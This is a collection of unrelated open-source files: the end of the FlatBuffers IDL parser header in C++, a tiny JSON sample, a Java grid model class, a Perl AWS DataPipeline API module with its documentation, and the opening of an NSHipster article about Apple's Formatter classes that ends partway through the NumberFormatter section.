int64_t value;
};
struct EnumDef : public Definition {
EnumDef() : is_union(false), uses_multiple_type_instances(false) {}
Offset<reflection::Enum> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Enum *values);
template<typename T> void ChangeEnumValue(EnumVal *ev, T new_val);
void SortByValue();
void RemoveDuplicates();
std::string AllFlags() const;
const EnumVal *MinValue() const;
const EnumVal *MaxValue() const;
// Returns the number of integer steps from v1 to v2.
uint64_t Distance(const EnumVal *v1, const EnumVal *v2) const;
// Returns the number of integer steps from Min to Max.
uint64_t Distance() const { return Distance(MinValue(), MaxValue()); }
EnumVal *ReverseLookup(int64_t enum_idx,
bool skip_union_default = false) const;
EnumVal *FindByValue(const std::string &constant) const;
std::string ToString(const EnumVal &ev) const {
return IsUInt64() ? NumToString(ev.GetAsUInt64())
: NumToString(ev.GetAsInt64());
}
size_t size() const { return vals.vec.size(); }
const std::vector<EnumVal *> &Vals() const {
return vals.vec;
}
const EnumVal *Lookup(const std::string &enum_name) const {
return vals.Lookup(enum_name);
}
bool is_union;
// Type is a union which uses type aliases where at least one type is
// available under two different names.
bool uses_multiple_type_instances;
Type underlying_type;
private:
bool IsUInt64() const {
return (BASE_TYPE_ULONG == underlying_type.base_type);
}
friend EnumValBuilder;
SymbolTable<EnumVal> vals;
};
inline bool IsStruct(const Type &type) {
return type.base_type == BASE_TYPE_STRUCT && type.struct_def->fixed;
}
inline bool IsUnion(const Type &type) {
return type.enum_def != nullptr && type.enum_def->is_union;
}
inline bool IsVector(const Type &type) {
return type.base_type == BASE_TYPE_VECTOR;
}
inline bool IsArray(const Type &type) {
return type.base_type == BASE_TYPE_ARRAY;
}
inline bool IsSeries(const Type &type) {
return IsVector(type) || IsArray(type);
}
inline bool IsEnum(const Type &type) {
return type.enum_def != nullptr && IsInteger(type.base_type);
}
inline size_t InlineSize(const Type &type) {
return IsStruct(type)
? type.struct_def->bytesize
: (IsArray(type)
? InlineSize(type.VectorType()) * type.fixed_length
: SizeOf(type.base_type));
}
inline size_t InlineAlignment(const Type &type) {
if (IsStruct(type)) {
return type.struct_def->minalign;
} else if (IsArray(type)) {
return IsStruct(type.VectorType()) ? type.struct_def->minalign
: SizeOf(type.element);
} else {
return SizeOf(type.base_type);
}
}
inline bool operator==(const EnumVal &lhs, const EnumVal &rhs) {
return lhs.value == rhs.value;
}
inline bool operator!=(const EnumVal &lhs, const EnumVal &rhs) {
return !(lhs == rhs);
}
inline bool EqualByName(const Type &a, const Type &b) {
return a.base_type == b.base_type && a.element == b.element &&
(a.struct_def == b.struct_def ||
a.struct_def->name == b.struct_def->name) &&
(a.enum_def == b.enum_def || a.enum_def->name == b.enum_def->name);
}
struct RPCCall : public Definition {
Offset<reflection::RPCCall> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::RPCCall *call);
StructDef *request, *response;
};
struct ServiceDef : public Definition {
Offset<reflection::Service> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Service *service);
SymbolTable<RPCCall> calls;
};
// Container of options that may apply to any of the source/text generators.
struct IDLOptions {
// Use flexbuffers instead for binary and text generation
bool use_flexbuffers;
bool strict_json;
bool skip_js_exports;
bool use_goog_js_export_format;
bool use_ES6_js_export_format;
bool output_default_scalars_in_json;
int indent_step;
bool output_enum_identifiers;
bool prefixed_enums;
bool scoped_enums;
bool include_dependence_headers;
bool mutable_buffer;
bool one_file;
bool proto_mode;
bool proto_oneof_union;
bool generate_all;
bool skip_unexpected_fields_in_json;
bool generate_name_strings;
bool generate_object_based_api;
bool gen_compare;
std::string cpp_object_api_pointer_type;
std::string cpp_object_api_string_type;
bool cpp_object_api_string_flexible_constructor;
bool gen_nullable;
bool java_checkerframework;
bool gen_generated;
std::string object_prefix;
std::string object_suffix;
bool union_value_namespacing;
bool allow_non_utf8;
bool natural_utf8;
std::string include_prefix;
bool keep_include_path;
bool binary_schema_comments;
bool binary_schema_builtins;
bool binary_schema_gen_embed;
bool skip_flatbuffers_import;
std::string go_import;
std::string go_namespace;
bool reexport_ts_modules;
bool js_ts_short_names;
bool protobuf_ascii_alike;
bool size_prefixed;
std::string root_type;
bool force_defaults;
bool java_primitive_has_method;
bool cs_gen_json_serializer;
std::vector<std::string> cpp_includes;
std::string cpp_std;
std::string proto_namespace_suffix;
std::string filename_suffix;
std::string filename_extension;
// Possible options for the more general generator below.
enum Language {
kJava = 1 << 0,
kCSharp = 1 << 1,
kGo = 1 << 2,
kCpp = 1 << 3,
kJs = 1 << 4,
kPython = 1 << 5,
kPhp = 1 << 6,
kJson = 1 << 7,
kBinary = 1 << 8,
kTs = 1 << 9,
kJsonSchema = 1 << 10,
kDart = 1 << 11,
kLua = 1 << 12,
kLobster = 1 << 13,
kRust = 1 << 14,
kKotlin = 1 << 15,
kSwift = 1 << 16,
kMAX
};
Language lang;
enum MiniReflect { kNone, kTypes, kTypesAndNames };
MiniReflect mini_reflect;
// The corresponding language bit will be set if a language is included
// for code generation.
unsigned long lang_to_generate;
// If set (default behavior), empty string fields will be set to nullptr to
// make the flatbuffer more compact.
bool set_empty_strings_to_null;
// If set (default behavior), empty vector fields will be set to nullptr to
// make the flatbuffer more compact.
bool set_empty_vectors_to_null;
IDLOptions()
: use_flexbuffers(false),
strict_json(false),
skip_js_exports(false),
use_goog_js_export_format(false),
use_ES6_js_export_format(false),
output_default_scalars_in_json(false),
indent_step(2),
output_enum_identifiers(true),
prefixed_enums(true),
scoped_enums(false),
include_dependence_headers(true),
mutable_buffer(false),
one_file(false),
proto_mode(false),
proto_oneof_union(false),
generate_all(false),
skip_unexpected_fields_in_json(false),
generate_name_strings(false),
generate_object_based_api(false),
gen_compare(false),
cpp_object_api_pointer_type("std::unique_ptr"),
cpp_object_api_string_flexible_constructor(false),
gen_nullable(false),
java_checkerframework(false),
gen_generated(false),
object_suffix("T"),
union_value_namespacing(true),
allow_non_utf8(false),
natural_utf8(false),
keep_include_path(false),
binary_schema_comments(false),
binary_schema_builtins(false),
binary_schema_gen_embed(false),
skip_flatbuffers_import(false),
reexport_ts_modules(true),
js_ts_short_names(false),
protobuf_ascii_alike(false),
size_prefixed(false),
force_defaults(false),
java_primitive_has_method(false),
cs_gen_json_serializer(false),
filename_suffix("_generated"),
filename_extension(),
lang(IDLOptions::kJava),
mini_reflect(IDLOptions::kNone),
lang_to_generate(0),
set_empty_strings_to_null(true),
set_empty_vectors_to_null(true) {}
};
// This encapsulates where the parser is in the current source file.
struct ParserState {
ParserState()
: cursor_(nullptr),
line_start_(nullptr),
line_(0),
token_(-1),
attr_is_trivial_ascii_string_(true) {}
protected:
void ResetState(const char *source) {
cursor_ = source;
line_ = 0;
MarkNewLine();
}
void MarkNewLine() {
line_start_ = cursor_;
line_ += 1;
}
int64_t CursorPosition() const {
FLATBUFFERS_ASSERT(cursor_ && line_start_ && cursor_ >= line_start_);
return static_cast<int64_t>(cursor_ - line_start_);
}
const char *cursor_;
const char *line_start_;
int line_; // the current line being parsed
int token_;
// Flag: text in attribute_ is true ASCII string without escape
// sequences. Only printable ASCII (without [\t\r\n]).
// Used for number-in-string (and base64 string in future).
bool attr_is_trivial_ascii_string_;
std::string attribute_;
std::vector<std::string> doc_comment_;
};
// A way to make error propagation less error prone by requiring values to be
// checked.
// Once you create a value of this type you must either:
// - Call Check() on it.
// - Copy or assign it to another value.
// Failure to do so leads to an assert.
// This guarantees that this as return value cannot be ignored.
class CheckedError {
public:
explicit CheckedError(bool error)
: is_error_(error), has_been_checked_(false) {}
CheckedError &operator=(const CheckedError &other) {
is_error_ = other.is_error_;
has_been_checked_ = false;
other.has_been_checked_ = true;
return *this;
}
CheckedError(const CheckedError &other) {
*this = other; // Use assignment operator.
}
~CheckedError() { FLATBUFFERS_ASSERT(has_been_checked_); }
bool Check() {
has_been_checked_ = true;
return is_error_;
}
private:
bool is_error_;
mutable bool has_been_checked_;
};
// Additionally, in GCC we can get these errors statically, for additional
// assurance:
// clang-format off
#ifdef __GNUC__
#define FLATBUFFERS_CHECKED_ERROR CheckedError \
__attribute__((warn_unused_result))
#else
#define FLATBUFFERS_CHECKED_ERROR CheckedError
#endif
// clang-format on
class Parser : public ParserState {
public:
explicit Parser(const IDLOptions &options = IDLOptions())
: current_namespace_(nullptr),
empty_namespace_(nullptr),
flex_builder_(256, flexbuffers::BUILDER_FLAG_SHARE_ALL),
root_struct_def_(nullptr),
opts(options),
uses_flexbuffers_(false),
source_(nullptr),
anonymous_counter(0),
recurse_protection_counter(0) {
if (opts.force_defaults) { builder_.ForceDefaults(true); }
// Start out with the empty namespace being current.
empty_namespace_ = new Namespace();
namespaces_.push_back(empty_namespace_);
current_namespace_ = empty_namespace_;
known_attributes_["deprecated"] = true;
known_attributes_["required"] = true;
known_attributes_["key"] = true;
known_attributes_["shared"] = true;
known_attributes_["hash"] = true;
known_attributes_["id"] = true;
known_attributes_["force_align"] = true;
known_attributes_["bit_flags"] = true;
known_attributes_["original_order"] = true;
known_attributes_["nested_flatbuffer"] = true;
known_attributes_["csharp_partial"] = true;
known_attributes_["streaming"] = true;
known_attributes_["idempotent"] = true;
known_attributes_["cpp_type"] = true;
known_attributes_["cpp_ptr_type"] = true;
known_attributes_["cpp_ptr_type_get"] = true;
known_attributes_["cpp_str_type"] = true;
known_attributes_["cpp_str_flex_ctor"] = true;
known_attributes_["native_inline"] = true;
known_attributes_["native_custom_alloc"] = true;
known_attributes_["native_type"] = true;
known_attributes_["native_default"] = true;
known_attributes_["flexbuffer"] = true;
known_attributes_["private"] = true;
}
~Parser() {
for (auto it = namespaces_.begin(); it != namespaces_.end(); ++it) {
delete *it;
}
}
// Parse the string containing either schema or JSON data, which will
// populate the SymbolTable's or the FlatBufferBuilder above.
// include_paths is used to resolve any include statements, and typically
// should at least include the project path (where you loaded source_ from).
// include_paths must be nullptr terminated if specified.
// If include_paths is nullptr, it will attempt to load from the current
// directory.
// If the source was loaded from a file and isn't an include file,
// supply its name in source_filename.
// All paths specified in this call must be in posix format, if you accept
// paths from user input, please call PosixPath on them first.
bool Parse(const char *_source, const char **include_paths = nullptr,
const char *source_filename = nullptr);
// Set the root type. May override the one set in the schema.
bool SetRootType(const char *name);
// Mark all definitions as already having code generated.
void MarkGenerated();
// Get the files recursively included by the given file. The returned
// container will have at least the given file.
std::set<std::string> GetIncludedFilesRecursive(
const std::string &file_name) const;
// Fills builder_ with a binary version of the schema parsed.
// See reflection/reflection.fbs
void Serialize();
// Deserialize a schema buffer
bool Deserialize(const uint8_t *buf, const size_t size);
// Fills internal structure as if the schema passed had been loaded by parsing
// with Parse except that included filenames will not be populated.
bool Deserialize(const reflection::Schema *schema);
Type *DeserializeType(const reflection::Type *type);
// Checks that the schema represented by this parser is a safe evolution
// of the schema provided. Returns non-empty error on any problems.
std::string ConformTo(const Parser &base);
// Similar to Parse(), but now only accepts JSON to be parsed into a
// FlexBuffer.
bool ParseFlexBuffer(const char *source, const char *source_filename,
flexbuffers::Builder *builder);
StructDef *LookupStruct(const std::string &id) const;
std::string UnqualifiedName(const std::string &fullQualifiedName);
FLATBUFFERS_CHECKED_ERROR Error(const std::string &msg);
private:
void Message(const std::string &msg);
void Warning(const std::string &msg);
FLATBUFFERS_CHECKED_ERROR ParseHexNum(int nibbles, uint64_t *val);
FLATBUFFERS_CHECKED_ERROR Next();
FLATBUFFERS_CHECKED_ERROR SkipByteOrderMark();
bool Is(int t) const;
bool IsIdent(const char *id) const;
FLATBUFFERS_CHECKED_ERROR Expect(int t);
std::string TokenToStringId(int t) const;
EnumDef *LookupEnum(const std::string &id);
FLATBUFFERS_CHECKED_ERROR ParseNamespacing(std::string *id,
std::string *last);
FLATBUFFERS_CHECKED_ERROR ParseTypeIdent(Type &type);
FLATBUFFERS_CHECKED_ERROR ParseType(Type &type);
FLATBUFFERS_CHECKED_ERROR AddField(StructDef &struct_def,
const std::string &name, const Type &type,
FieldDef **dest);
FLATBUFFERS_CHECKED_ERROR ParseField(StructDef &struct_def);
FLATBUFFERS_CHECKED_ERROR ParseString(Value &val);
FLATBUFFERS_CHECKED_ERROR ParseComma();
FLATBUFFERS_CHECKED_ERROR ParseAnyValue(Value &val, FieldDef *field,
size_t parent_fieldn,
const StructDef *parent_struct_def,
uoffset_t count,
bool inside_vector = false);
template<typename F>
FLATBUFFERS_CHECKED_ERROR ParseTableDelimiters(size_t &fieldn,
const StructDef *struct_def,
F body);
FLATBUFFERS_CHECKED_ERROR ParseTable(const StructDef &struct_def,
std::string *value, uoffset_t *ovalue);
void SerializeStruct(const StructDef &struct_def, const Value &val);
void SerializeStruct(FlatBufferBuilder &builder, const StructDef &struct_def,
const Value &val);
template<typename F>
FLATBUFFERS_CHECKED_ERROR ParseVectorDelimiters(uoffset_t &count, F body);
FLATBUFFERS_CHECKED_ERROR ParseVector(const Type &type, uoffset_t *ovalue,
FieldDef *field, size_t fieldn);
FLATBUFFERS_CHECKED_ERROR ParseArray(Value &array);
FLATBUFFERS_CHECKED_ERROR ParseNestedFlatbuffer(
Value &val, FieldDef *field, size_t fieldn,
const StructDef *parent_struct_def);
FLATBUFFERS_CHECKED_ERROR ParseMetaData(SymbolTable<Value> *attributes);
FLATBUFFERS_CHECKED_ERROR TryTypedValue(const std::string *name, int dtoken,
bool check, Value &e, BaseType req,
bool *destmatch);
FLATBUFFERS_CHECKED_ERROR ParseHash(Value &e, FieldDef *field);
FLATBUFFERS_CHECKED_ERROR TokenError();
FLATBUFFERS_CHECKED_ERROR ParseSingleValue(const std::string *name, Value &e,
bool check_now);
FLATBUFFERS_CHECKED_ERROR ParseEnumFromString(const Type &type,
std::string *result);
StructDef *LookupCreateStruct(const std::string &name,
bool create_if_new = true,
bool definition = false);
FLATBUFFERS_CHECKED_ERROR ParseEnum(bool is_union, EnumDef **dest);
FLATBUFFERS_CHECKED_ERROR ParseNamespace();
FLATBUFFERS_CHECKED_ERROR StartStruct(const std::string &name,
StructDef **dest);
FLATBUFFERS_CHECKED_ERROR StartEnum(const std::string &name, bool is_union,
EnumDef **dest);
FLATBUFFERS_CHECKED_ERROR ParseDecl();
FLATBUFFERS_CHECKED_ERROR ParseService();
FLATBUFFERS_CHECKED_ERROR ParseProtoFields(StructDef *struct_def,
bool isextend, bool inside_oneof);
FLATBUFFERS_CHECKED_ERROR ParseProtoOption();
FLATBUFFERS_CHECKED_ERROR ParseProtoKey();
FLATBUFFERS_CHECKED_ERROR ParseProtoDecl();
FLATBUFFERS_CHECKED_ERROR ParseProtoCurliesOrIdent();
FLATBUFFERS_CHECKED_ERROR ParseTypeFromProtoType(Type *type);
FLATBUFFERS_CHECKED_ERROR SkipAnyJsonValue();
FLATBUFFERS_CHECKED_ERROR ParseFlexBufferValue(flexbuffers::Builder *builder);
FLATBUFFERS_CHECKED_ERROR StartParseFile(const char *source,
const char *source_filename);
FLATBUFFERS_CHECKED_ERROR ParseRoot(const char *_source,
const char **include_paths,
const char *source_filename);
FLATBUFFERS_CHECKED_ERROR DoParse(const char *_source,
const char **include_paths,
const char *source_filename,
const char *include_filename);
FLATBUFFERS_CHECKED_ERROR CheckClash(std::vector<FieldDef *> &fields,
StructDef *struct_def,
const char *suffix, BaseType baseType);
bool SupportsAdvancedUnionFeatures() const;
bool SupportsAdvancedArrayFeatures() const;
Namespace *UniqueNamespace(Namespace *ns);
FLATBUFFERS_CHECKED_ERROR RecurseError();
template<typename F> CheckedError Recurse(F f);
public:
SymbolTable<Type> types_;
SymbolTable<StructDef> structs_;
SymbolTable<EnumDef> enums_;
SymbolTable<ServiceDef> services_;
std::vector<Namespace *> namespaces_;
Namespace *current_namespace_;
Namespace *empty_namespace_;
std::string error_; // User readable error_ if Parse() == false
FlatBufferBuilder builder_; // any data contained in the file
flexbuffers::Builder flex_builder_;
flexbuffers::Reference flex_root_;
StructDef *root_struct_def_;
std::string file_identifier_;
std::string file_extension_;
std::map<std::string, std::string> included_files_;
std::map<std::string, std::set<std::string>> files_included_per_file_;
std::vector<std::string> native_included_files_;
std::map<std::string, bool> known_attributes_;
IDLOptions opts;
bool uses_flexbuffers_;
private:
const char *source_;
std::string file_being_parsed_;
std::vector<std::pair<Value, FieldDef *>> field_stack_;
int anonymous_counter;
int recurse_protection_counter;
};
// Utility functions for multiple generators:
extern std::string MakeCamel(const std::string &in, bool first = true);
extern std::string MakeScreamingCamel(const std::string &in);
// Generate text (JSON) from a given FlatBuffer, and a given Parser
// object that has been populated with the corresponding schema.
// If ident_step is 0, no indentation will be generated. Additionally,
// if it is less than 0, no linefeeds will be generated either.
// See idl_gen_text.cpp.
// strict_json adds "quotes" around field names if true.
// If the flatbuffer cannot be encoded in JSON (e.g., it contains non-UTF-8
// byte arrays in String values), returns false.
extern bool GenerateTextFromTable(const Parser &parser, const void *table,
const std::string &tablename,
std::string *text);
extern bool GenerateText(const Parser &parser, const void *flatbuffer,
std::string *text);
extern bool GenerateTextFile(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate binary files from a given FlatBuffer, and a given Parser
// object that has been populated with the corresponding schema.
// See code_generators.cpp.
extern bool GenerateBinary(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a C++ header from the definitions in the Parser object.
// See idl_gen_cpp.
extern bool GenerateCPP(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate C# files from the definitions in the Parser object.
// See idl_gen_csharp.cpp.
extern bool GenerateCSharp(const Parser &parser, const std::string &path,
const std::string &file_name);
extern bool GenerateDart(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Java files from the definitions in the Parser object.
// See idl_gen_java.cpp.
extern bool GenerateJava(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate JavaScript or TypeScript code from the definitions in the Parser
// object. See idl_gen_js.
extern bool GenerateJSTS(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Go files from the definitions in the Parser object.
// See idl_gen_go.cpp.
extern bool GenerateGo(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Php code from the definitions in the Parser object.
// See idl_gen_php.
extern bool GeneratePhp(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Python files from the definitions in the Parser object.
// See idl_gen_python.cpp.
extern bool GeneratePython(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Lobster files from the definitions in the Parser object.
// See idl_gen_lobster.cpp.
extern bool GenerateLobster(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Lua files from the definitions in the Parser object.
// See idl_gen_lua.cpp.
extern bool GenerateLua(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Rust files from the definitions in the Parser object.
// See idl_gen_rust.cpp.
extern bool GenerateRust(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Json schema file
// See idl_gen_json_schema.cpp.
extern bool GenerateJsonSchema(const Parser &parser, const std::string &path,
const std::string &file_name);
extern bool GenerateKotlin(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate Swift classes.
// See idl_gen_swift.cpp
extern bool GenerateSwift(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a schema file from the internal representation, useful after
// parsing a .proto schema.
extern std::string GenerateFBS(const Parser &parser,
const std::string &file_name);
extern bool GenerateFBS(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated JavaScript or TypeScript code.
// See idl_gen_js.cpp.
extern std::string JSTSMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated C++ header.
// See idl_gen_cpp.cpp.
extern std::string CPPMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated Dart code
// see idl_gen_dart.cpp
extern std::string DartMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated Rust code.
// See idl_gen_rust.cpp.
extern std::string RustMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate a make rule for generated Java or C# files.
// See code_generators.cpp.
extern std::string JavaCSharpMakeRule(const Parser &parser,
const std::string &path,
const std::string &file_name);
// Generate a make rule for the generated text (JSON) files.
// See idl_gen_text.cpp.
extern std::string TextMakeRule(const Parser &parser, const std::string &path,
const std::string &file_names);
// Generate a make rule for the generated binary files.
// See code_generators.cpp.
extern std::string BinaryMakeRule(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Cpp interfaces.
// See idl_gen_grpc.cpp.
bool GenerateCppGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Go interfaces.
// See idl_gen_grpc.cpp.
bool GenerateGoGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Java classes.
// See idl_gen_grpc.cpp
bool GenerateJavaGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Python interfaces.
// See idl_gen_grpc.cpp.
bool GeneratePythonGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
// Generate GRPC Swift interfaces.
// See idl_gen_grpc.cpp.
extern bool GenerateSwiftGRPC(const Parser &parser, const std::string &path,
const std::string &file_name);
} // namespace flatbuffers
#endif // FLATBUFFERS_IDL_H_
| {
"pile_set_name": "Github"
} |
{
"data": {
"hello": "World",
"world": "Hello"
}
}
| {
"pile_set_name": "Github"
} |
package com.tencent.ttpic.model;
public class GridModel {
public int aspectMode;
public Rect canvasRect;
public int positionMode;
public int renderId;
public int transformType;
public int zIndex;
}
| {
"pile_set_name": "Github"
} |
package Paws::DataPipeline::ListPipelines;
use Moose;
has Marker => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'marker' );
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'ListPipelines');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::DataPipeline::ListPipelinesOutput');
class_has _result_key => (isa => 'Str', is => 'ro');
1;
### main pod documentation begin ###
=head1 NAME
Paws::DataPipeline::ListPipelines - Arguments for method ListPipelines on L<Paws::DataPipeline>
=head1 DESCRIPTION
This class represents the parameters used for calling the method ListPipelines on the
L<AWS Data Pipeline|Paws::DataPipeline> service. Use the attributes of this class
as arguments to method ListPipelines.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to ListPipelines.
=head1 SYNOPSIS
my $datapipeline = Paws->service('DataPipeline');
my $ListPipelinesOutput = $datapipeline->ListPipelines(
Marker => 'Mystring', # OPTIONAL
);
# Results:
my $HasMoreResults = $ListPipelinesOutput->HasMoreResults;
my $Marker = $ListPipelinesOutput->Marker;
my $PipelineIdList = $ListPipelinesOutput->PipelineIdList;
# Returns a L<Paws::DataPipeline::ListPipelinesOutput> object.
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/datapipeline/ListPipelines>
=head1 ATTRIBUTES
=head2 Marker => Str
The starting point for the results to be returned. For the first call,
this value should be empty. As long as there are more results, continue
to call C<ListPipelines> with the marker value from the previous call
to retrieve the next set of results.
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method ListPipelines in L<Paws::DataPipeline>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| {
"pile_set_name": "Github"
} |
---
title: Formatter
author: Mattt
category: Cocoa
tags: nshipster, popular
excerpt: >-
Conversion is a tireless errand in software development.
Most programs boil down to some variation of
transforming data into something more useful.
revisions:
"2014-06-30": Converted examples to Swift; added iOS 8 & OS X Yosemite formatter classes.
"2015-02-17": Converted remaining examples to Swift; reintroduced Objective-C examples; added Objective-C examples for new formatter classes.
"2019-07-15": Updated for iOS 13 & macOS 10.15
status:
swift: 5.1
reviewed: July 15, 2019
---
Conversion is a tireless errand in software development.
Most programs boil down to some variation of
transforming data into something more useful.
In the case of user-facing software,
making data human-readable is an essential task ---
and a complex one at that.
A user's preferred language, calendar, and currency
can all factor into how information should be displayed,
as can other constraints, such as a label's dimensions.
All of this is to say:
calling `description` on an object just doesn't cut it
under most circumstances.
Indeed,
the real tool for this job is <dfn>`Formatter`</dfn>:
an ancient, abstract class deep in the heart of the Foundation framework
that's responsible for transforming data into textual representations.
---
`Formatter`'s origins trace back to `NSCell`,
which is used to display information and accept user input in
tables, form fields, and other views in AppKit.
Much of the API design of `(NS)Formatter` reflects this.
Back then,
formatters came in two flavors: dates and numbers.
But these days,
there are formatters for everything from
physical quantities and time intervals to personal names and postal addresses.
And as if that weren't enough to keep straight,
a good portion of these have been
<dfn>soft-deprecated</dfn>,
or otherwise superseded by more capable APIs (that are also formatters).
{% error %}
There are so many formatters in Apple SDKs
that it's impossible to keep them all in working memory.
Apparently, this is as true of computers as it is for humans;
at the time of writing,
[searching for "formatter" on developer.apple.com](https://developer.apple.com/search/?q=formatter&type=Reference)
fails with a timeout!
{% enderror %}
To make sense of everything,
this week's article groups each of the built-in formatters
into one of four categories:
[Numbers and Quantities](#formatting-numbers-and-quantities)
: [`NumberFormatter`](#numberformatter)
: [`MeasurementFormatter`](#measurementformatter)
[Dates, Times, and Durations](#formatting-dates-times-and-durations)
: [`DateFormatter`](#dateformatter)
: [`ISO8601DateFormatter`](#iso8601dateformatter)
: [`DateComponentsFormatter`](#datecomponentsformatter)
: [`DateIntervalFormatter`](#dateintervalformatter)
: [`RelativeDateTimeFormatter`](#relativedatetimeformatter)
[People and Places](#formatting-people-and-places)
: [`PersonNameComponentsFormatter`](#personnamecomponentsformatter)
: [`CNPostalAddressFormatter`](#cnpostaladdressformatter)
[Lists and Items](#formatting-lists-and-items)
: [`ListFormatter`](#listformatter)
---
## Formatting Numbers and Quantities
| Class | Example Output | Availability |
| ---------------------- | --------------- | ---------------------------- |
| `NumberFormatter` | "1,234.56" | iOS 2.0 <br/> macOS 10.0+ |
| `MeasurementFormatter` | "-9.80665 m/s²" | iOS 10.0+ <br/> macOS 10.12+ |
| `ByteCountFormatter` | "756 KB" | iOS 6.0+ <br/> macOS 10.8+ |
| `EnergyFormatter` | "80 kcal" | iOS 8.0+ <br/> macOS 10.10+ |
| `MassFormatter` | "175 lb" | iOS 8.0+ <br/> macOS 10.10+ |
| `LengthFormatter` | "5 ft, 11 in" | iOS 8.0+ <br/> macOS 10.10+ |
| `MKDistanceFormatter` | "500 miles" | iOS 7.0+ <br/> macOS 10.9+ |
{% warning %}
`ByteCountFormatter`,
`EnergyFormatter`,
`MassFormatter`,
`LengthFormatter`, and
`MKDistanceFormatter`
are superseded by `MeasurementFormatter`.
| Legacy Formatter | Measurement Formatter Unit |
| --------------------- | -------------------------- |
| `ByteCountFormatter` | `UnitInformationStorage` |
| `EnergyFormatter` | `UnitEnergy` |
| `MassFormatter` | `UnitMass` |
| `LengthFormatter` | `UnitLength` |
| `MKDistanceFormatter` | `UnitLength` |
The only occasions in which you might still use
`EnergyFormatter`, `MassFormatter`, or `LengthFormatter`
are when working with the HealthKit framework;
these formatters provide conversion and interoperability
with `HKUnit` quantities.
{% endwarning %}
### NumberFormatter
`NumberFormatter` covers every aspect of number formatting imaginable.
For better or for worse
_(mostly for better)_,
this all-in-one API handles
ordinals and cardinals,
mathematical and scientific notation,
percentages,
and monetary amounts in various flavors.
It can even write out numbers in a few different languages!
So whenever you reach for `NumberFormatter`,
the first order of business is to establish
what _kind_ of number you're working with
and set the `numberStyle` property accordingly.
#### Number Styles
| Number Style | Example Output |
| -------------------- | ------------------------ |
| `none` | 123 |
| `decimal` | 123.456 |
| `percent` | 12% |
| `scientific` | 1.23456789E4 |
| `spellOut` | one hundred twenty-three |
| `ordinal` | 3rd |
| `currency` | \$1234.57 |
| `currencyAccounting` | (\$1234.57) |
| `currencyISOCode` | USD1,234.57 |
| `currencyPlural` | 1,234.57 US dollars |
{% warning %}
`NumberFormatter` also has a `format` property
that takes a familiar `SPRINTF(3)`-style format string.
[As we've argued in a previous article](/expressiblebystringinterpolation/),
format strings are something to be avoided unless absolutely necessary.
{% endwarning %}
#### Rounding & Significant Digits
To prevent numbers from getting annoyingly pedantic
_("thirty-two point three three --- repeating, of course…")_,
you'll want to get a handle on `NumberFormatter`'s rounding behavior.
Here, you have two options:
- Set `usesSignificantDigits` to `true`
to format according to the rules of
[<dfn>significant figures</dfn>](https://en.wikipedia.org/wiki/Significant_figures)
```swift
var formatter = NumberFormatter()
formatter.usesSignificantDigits = true
formatter.minimumSignificantDigits = 1 // default
formatter.maximumSignificantDigits = 6 // default
formatter.string(from: 1234567) // 1234570
formatter.string(from: 1234.567) // 1234.57
formatter.string(from: 100.234567) // 100.235
formatter.string(from: 1.23000) // 1.23
formatter.string(from: 0.0000123) // 0.0000123
```
- Set `usesSignificantDigits` to `false`
_(or keep as-is, since that's the default)_
to format according to specific limits on
how many <dfn>decimal</dfn> and <dfn>fraction</dfn> digits to show
(the number of digits leading or trailing the decimal point, respectively).
```swift
var formatter = NumberFormatter()
formatter.usesSignificantDigits = false
formatter.minimumIntegerDigits = 0 // default
formatter.maximumIntegerDigits = 42 // default (seriously)
formatter.minimumFractionDigits = 0 // default
formatter.maximumFractionDigits = 0 // default
formatter.string(from: 1234567) // 1234567
formatter.string(from: 1234.567) // 1235
formatter.string(from: 100.234567) // 100
formatter.string(from: 1.23000) // 1
formatter.string(from: 0.0000123) // 0
```
If you need specific rounding behavior,
such as "round to the nearest integer" or "round towards zero",
check out the
`roundingMode`,
`roundingIncrement`, and
`roundingBehavior` properties.
#### Locale Awareness
Nearly everything about the formatter can be customized,
including the
grouping separator,
decimal separator,
negative symbol,
percent symbol,
infinity symbol,
and
how to represent zero values.
Although these settings can be overridden on an individual basis,
it's typically best to defer to the defaults provided by the user's locale.
